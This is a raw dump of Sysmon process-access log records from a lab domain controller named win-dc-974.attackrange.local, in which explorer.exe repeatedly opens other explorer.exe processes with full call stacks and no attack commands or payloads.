16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 